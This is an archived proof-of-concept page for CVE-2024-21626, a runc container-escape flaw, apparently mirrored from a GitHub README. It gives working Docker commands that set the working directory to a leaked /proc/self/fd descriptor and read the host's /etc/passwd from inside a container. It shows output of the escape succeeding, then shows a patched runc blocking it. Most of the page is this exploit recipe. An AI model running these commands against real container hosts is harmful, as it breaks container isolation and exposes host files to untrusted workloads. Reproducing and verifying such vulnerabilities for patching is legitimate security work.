Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-21626 PoC — runc 安全漏洞

Source
https://github.com/zhangguanzhang/CVE-2024-21626
Associated Vulnerability
Title:runc 安全漏洞 (CVE-2024-21626)
Description:runc是一款用于根据OCI规范生成和运行容器的CLI(命令行界面)工具。 runc 1.1.12之前版本存在安全漏洞,该漏洞源于fds 内部泄漏,导致多个容器发生泄漏。
Readme
## about

Steps to reproduce

ensure kernal >= `(5.4,4.19,..)` and there is `openat2` in `/proc/kallsyms`. `v1.0.0-rc93<= runc <=1.1.11`

```
$ grep openat2 /proc/kallsyms
ffffffffa64290d0 T __pfx___audit_openat2_how
ffffffffa64290e0 T __audit_openat2_how
ffffffffa666de90 t __pfx_do_sys_openat2
ffffffffa666dea0 t do_sys_openat2
ffffffffa666e020 t __pfx___do_sys_openat2
ffffffffa666e030 t __do_sys_openat2
ffffffffa666e150 T __pfx___x64_sys_openat2
ffffffffa666e160 T __x64_sys_openat2
ffffffffa666e190 T __pfx___ia32_sys_openat2
ffffffffa666e1a0 T __ia32_sys_openat2
ffffffffa69871e0 T __pfx_io_openat2_prep
ffffffffa69871f0 T io_openat2_prep
ffffffffa6987280 T __pfx_io_openat2
ffffffffa6987290 T io_openat2
ffffffffa863d1e0 d event_exit__openat2
ffffffffa863d260 d event_enter__openat2
ffffffffa863d2e0 d __syscall_meta__openat2
ffffffffa863d320 d args__openat2
ffffffffa863d340 d types__openat2
ffffffffa8affb48 d __event_exit__openat2
ffffffffa8affb50 d __event_enter__openat2
ffffffffa8b02b18 d __p_syscall_meta__openat2
ffffffffa8b056f0 d _eil_addr___ia32_sys_openat2
ffffffffa8b05700 d _eil_addr___x64_sys_openat2
```

get host file:

```
$ tail -n1 /etc/passwd
gnome-initial-setup:x:126:65534::/run/gnome-initial-setup/:/bin/false
$ seq 10 | while read line;do docker run --rm -w /proc/self/fd/$line ubuntu tail -n1 ../../../../../etc/passwd |& grep -Ev Error ; done
gnome-initial-setup:x:126:65534::/run/gnome-initial-setup/:/bin/false
```

get fd number

```
$ seq 10 | while read line;do docker run --rm -w /proc/self/fd/$line -tid --name s-$line ubuntu   ; done
$ docker ps -a | grep -P 's-\d$'
c171e8ac9a1a  ubuntu    "bash"  About a minute ago   Up About a minute  s-7
```

number is 7 on my machine, and exec in old container:

```
$ docker exec -ti -w /proc/self/fd/7 xxxxx tail -n1 /proc/self/cwd/../../../../../etc/passwd
gnome-initial-setup:x:126:65534::/run/gnome-initial-setup/:/bin/false
```

after replace runc:

```
$ cp runc.amd64 /usr/bin/runc
$ docker exec -ti -w /proc/self/fd/7 xxxxx tail -n1 /proc/self/cwd/../../../../../etc/passwd
OCI runtime exec failed: exec failed: unable to start container process: chdir to cwd ("/proc/self/fd/7") set in config.json failed: not a directory: unknown: Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type
```
File Snapshot

 [4.0K]  /data/pocs/26d32e62e74dc9542911364e1d0f937d14159d31
└── [2.3K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.